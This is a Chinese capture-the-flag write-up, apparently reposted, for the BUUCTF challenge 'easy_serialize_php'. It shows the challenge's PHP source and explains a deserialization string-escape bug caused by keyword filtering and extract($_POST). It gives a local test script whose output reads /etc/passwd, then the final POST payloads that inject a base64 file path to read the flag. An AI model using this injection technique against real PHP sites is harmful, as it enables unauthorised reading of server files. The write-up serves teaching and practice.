BUUCTF:[安洵杯 2019]easy_serialize_php
Posted 末 初
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF:[安洵杯 2019]easy_serialize_php相关的知识,希望对你有一定的参考价值。
https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php
访问/index.php?f=highlight_file得到源码
<?php
$function = @$_GET['f'];
function filter($img)
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
if($_SESSION)
unset($_SESSION);
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function)
echo '<a href="index.php?f=highlight_file">source_code</a>';
if(!$_GET['img_path'])
$_SESSION['img'] = base64_encode('guest_img.png');
else
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file')
highlight_file('index.php');
else if($function == 'phpinfo')
eval('phpinfo();'); //maybe you can find something in here!
else if($function == 'show_image')
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
唯一可控的利用点是file_get_contents(base64_decode($userinfo['img']));存在任意文件读取,不过$_GET['img_path']被sha1加密了一次,所以我们无法通过给$_GET['img_path']传参控制$_SESSION['img']。
但是filter()函数会对序列化之后的字符串进行过滤,有一个替换字符串的操作,会造成反序列化字符串溢出。而且extract($_POST);使得我们可以通过传参POST参数控制$_SESSION[]数组的部分值,利用以上条件即可注入一个新的$_SESSION['img']对象,进而造成任意文件读取。
<?php
function filter($img)
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'show_image';
$_SESSION["flagphp"] = ';s:6:"mochu7";s:3:"img";s:16:"L2V0Yy9wYXNzd2Q=";';
$_SESSION['img'] = base64_encode('guest_img.png');
// $_SESSION["img"] = base64_encode('/etc/passwd');
echo serialize($_SESSION)."\\n";
echo filter(serialize($_SESSION))."\\n";
$data = filter(serialize($_SESSION));
$userinfo = unserialize($data);
var_dump($userinfo);
var_dump($userinfo['img']);
var_dump(base64_decode($userinfo['img']));
?>
运行结果如下
PS D:\\phpstudy_pro\\WWW> php -f .\\index.php
a:4:s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:7:"flagphp";s:49:";s:6:"mochu7";s:3:"img";s:16:"L2V0Yy9wYXNzd2Q=";";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";
a:4:s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:7:"";s:49:";s:6:"mochu7";s:3:"img";s:16:"L2V0Yy9wYXNzd2Q=";";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";
D:\\phpstudy_pro\\WWW\\index.php:20:
array(4)
'user' =>
string(5) "guest"
'function' =>
string(10) "show_image"
'";s:49:' =>
string(6) "mochu7"
'img' =>
string(16) "L2V0Yy9wYXNzd2Q="
D:\\phpstudy_pro\\WWW\\index.php:21:
string(16) "L2V0Yy9wYXNzd2Q="
D:\\phpstudy_pro\\WWW\\index.php:22:
string(11) "/etc/passwd"
修改payload
_SESSION[flagphp]=;s:6:"mochu7";s:3:"img";s:20:"Li9kMGczX2YxYWcucGhw";
_SESSION[flagphp]=;s:6:"mochu7";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";
以上是关于BUUCTF:[安洵杯 2019]easy_serialize_php的主要内容,如果未能解决你的问题,请参考以下文章
BUUCTF:[安洵杯 2019]easy_serialize_php